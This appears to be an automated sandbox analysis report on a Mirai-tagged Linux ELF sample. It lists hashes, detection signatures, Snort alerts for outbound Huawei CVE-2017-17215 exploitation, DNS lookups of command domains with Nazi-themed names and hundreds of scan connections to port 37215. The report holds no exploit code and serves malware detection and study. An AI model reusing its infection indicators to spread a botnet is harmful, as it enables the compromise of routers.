Linux Analysis Report
ul5RjxwWTK.elf

Overview

General Information

Sample name:	ul5RjxwWTK.elf renamed because original name is a hash value
Original sample name:	f3aec1734ebf34a7ca5b0674475023a7.elf
Analysis ID:	1428800
MD5:	f3aec1734ebf34a7ca5b0674475023a7
SHA1:	d4447b3793cf6e497dae0107f93ce2dffddadc1c
SHA256:	8a0560ffc6fd06015192f3d164f0ca068138382e56357288d137fc5699f37e3d
Tags:	32elfintelmirai
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Machine Learning detection for sample

Queries the IP of a very long domain name

Sample deletes itself

Sample tries to kill multiple processes (SIGKILL)

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

HTTP GET or POST without a user agent

Sample contains only a LOAD segment without any section mappings

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: ul5RjxwWTK.elf

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: ul5RjxwWTK.elf

Joe Sandbox ML: detected

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34688 -> 31.200.68.93:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34688 -> 31.200.68.93:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41692 -> 163.191.34.49:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41692 -> 163.191.34.49:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59250 -> 94.123.19.233:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59250 -> 94.123.19.233:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58610 -> 83.66.57.104:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58610 -> 83.66.57.104:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35792 -> 147.47.79.157:37215
Source: Traffic	Snort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35792 -> 147.47.79.157:37215

Queries the IP of a very long domain name

Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.$}"f66PV,PV!E((b@2#o)__)`P$}"f'66PV,PV!E(()
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.)}"f66PV,PV!E(@+_P;)}"f66PV,PV!EH(
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su..}"f2]RRPV,PV!EDyQUE(a.8_8P].}"f
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.3}"f'<<PV!PV,E(X@Wy_WyP]gD3}"f,<<PV!PV,
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.8}"f}<<PV!PV,E(@5F_FP]98}"f~<<PV!PV,
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"fLRRPV,PV!EDr)d*E($2"E_EP]F?}"f$P
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"fJx66PV,PV!E(%:'50?}"fxNNPV!PV,E@.@@y5,0kzadolfhitlersun?}"f66PV,PV!E(:6
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"f66PV,PV!E(:65:0?}"fNNPV!PV,E@.@@q'5,0kzadolfhitlersun?}"f_<<PV!PV,E(k8@J_
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"f_<<PV!PV,E(k8@J_JP]7?}"f_<<PV!PV,
Source: unknown	DNS traffic detected: query: kz.adolfhitler.su.?}"f?66PV,PV!E(\Ar_AsP?}"f-RRPV,PV!ED
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.B}"f'66PV,PV!E((H]@.aq_arPB}"f(66PV,PV!E(.1?=5{4B}"fNNPV!PV,E@9@@GV=5,).iegheilhitersunB}"f166PV,PV!E(}3==5\QB}"f2NNPV!.V,E@9@@G>=5,siegheilhitersunB}"f76
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.B}"f166PV,PV!E(}3==5\QB}"f2NNPV!PV,E@9
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.B}"f766PV,PV!EH(wwq}_~P/B}"fXXPV,PV!EJK.4\|E(+~5_5P]kB}"fK<<PV!PV,E.@y_P]
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.C}"f6FFPV,PV!E8c7,Ti%E(c87Ti_TiC}"f<FFPV
Source: unknown	DNS traffic detected: query: siegheil.hiter.su.C}"fRRPV,PV!EHDy+E(I:4dP_PP]\C}"fk

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 34688 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59250 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58610 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35792 -> 37215

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.43.138.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.199.46.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 220.45.152.133:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.202.20.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.226.217.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.148.57.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.82.58.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.90.182.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.177.191.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 185.43.20.146:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 84.113.211.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.218.51.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.71.199.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 105.71.149.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.223.217.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 205.100.192.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 198.104.199.41:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 104.190.185.49:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.170.156.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.178.248.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.251.62.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 82.153.137.13:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.157.159.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.53.30.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.138.254.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.57.129.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.121.183.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 64.235.3.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.137.17.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.172.198.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.23.242.135:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 183.18.78.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.134.38.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.74.204.95:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.171.71.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.109.56.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 101.247.147.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 147.19.19.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.117.192.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.63.15.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.24.122.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.57.158.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.92.235.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.77.179.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 135.200.78.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 158.6.148.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.109.141.56:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.93.140.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.54.89.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.55.232.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.195.109.12:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 145.231.236.34:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.47.101.106:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.53.18.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.197.78.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.191.119.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.2.224.19:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.63.187.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.225.34.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.232.224.202:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.193.179.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.161.23.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.51.112.152:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.169.125.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.84.57.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.84.134.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.136.252.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 111.248.83.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 96.149.167.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.131.23.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.85.148.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 188.59.160.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.155.58.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.158.120.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.79.146.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.116.176.156:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.163.242.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.129.37.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.56.243.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 117.43.236.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 114.45.57.201:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.115.239.51:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.155.37.83:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.102.70.8:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 59.70.64.2:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.252.165.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.213.197.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.63.188.70:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 110.94.171.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 189.233.81.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.152.176.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.207.34.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.162.176.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 131.83.17.238:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.252.252.225:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.163.253.52:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.158.27.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.39.62.78:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.100.116.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 48.138.78.143:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.180.113.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.140.56.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 23.138.239.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.218.235.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 124.73.14.226:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 53.57.252.84:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.112.14.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 67.200.141.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.86.126.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 93.62.63.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.69.240.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.141.167.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.67.20.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.110.169.233:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.203.34.224:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 53.20.111.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.215.204.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.81.163.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 176.1.230.109:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.0.236.19:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.182.91.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.122.139.249:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.39.117.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.47.233.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.16.178.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 200.234.193.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.245.252.33:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.191.45.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.222.144.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.161.221.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.114.204.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.74.122.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.243.230.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.79.111.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 31.56.59.90:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.241.208.17:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.15.150.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.126.244.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.253.99.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 148.250.129.132:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 73.91.73.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.136.236.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.209.185.108:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 84.227.173.40:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.59.198.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.122.130.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.11.238.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 191.154.83.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.46.96.186:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 148.140.84.182:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.149.114.68:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.10.143.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.222.209.165:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.137.116.18:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.219.229.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.9.39.97:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.100.215.88:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 97.2.87.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.145.10.248:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.150.195.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.211.75.148:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 81.153.6.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.45.214.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.140.97.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.58.182.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.212.125.69:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 183.27.198.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.150.44.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 154.58.2.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 1.20.136.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.254.25.255:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.87.146.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.252.3.173:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.48.253.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 40.105.130.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.68.243.236:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.242.89.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 122.218.232.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 65.185.44.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.150.205.218:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.226.227.76:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.201.249.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 129.20.51.31:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 220.37.210.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.106.159.189:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.45.30.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.81.100.171:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 78.79.92.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.14.160.128:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 208.235.87.164:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.133.164.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.115.83.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.127.153.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.12.55.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.8.249.75:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.15.241.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.167.177.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.102.217.16:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.216.93.130:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.179.255.245:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.8.178.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.32.100.111:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 51.4.163.62:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.245.38.11:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.85.248.239:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 109.150.132.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 9.204.150.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.211.118.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.30.241.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.47.247.93:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 48.23.116.228:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 17.95.14.169:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 189.229.207.112:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.225.58.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.43.19.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.144.169.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.126.222.53:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 180.99.137.179:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.47.184.205:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.83.152.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.131.55.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.104.218.235:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.187.189.205:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.64.186.131:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 101.18.102.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.237.247.162:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.110.31.154:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.90.82.183:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.10.82.91:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.170.77.107:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.48.124.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 180.247.10.170:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 70.246.244.74:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.197.201.231:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.41.18.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.186.108.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.33.87.207:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.230.223.161:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.77.225.23:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.78.24.140:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.12.186.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.190.64.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.98.8.119:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.128.226.73:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.187.127.110:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.140.16.215:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.99.251.117:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 222.143.198.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 24.196.190.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 64.159.26.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.119.75.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.41.87.26:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 5.34.233.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.72.171.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.122.167.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.83.45.100:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.185.17.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.49.250.176:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.121.54.129:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 130.90.117.214:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.179.204.189:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 209.78.250.46:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.93.139.113:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.124.171.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.144.156.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.216.122.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.36.108.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.106.139.114:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 202.47.165.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 81.221.127.167:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.42.129.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.190.12.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.221.216.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 18.3.113.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.170.247.59:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.18.108.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.11.139.12:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.223.141.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.171.75.15:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.130.139.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.250.98.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.127.29.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.193.150.206:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.43.251.96:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.176.93.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.251.156.194:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.30.234.3:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 176.57.225.147:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 157.116.14.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 197.193.193.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 110.125.68.89:37215
Source: global traffic	TCP traffic: 192.168.2.23:6391 -> 41.249.253.91:37215
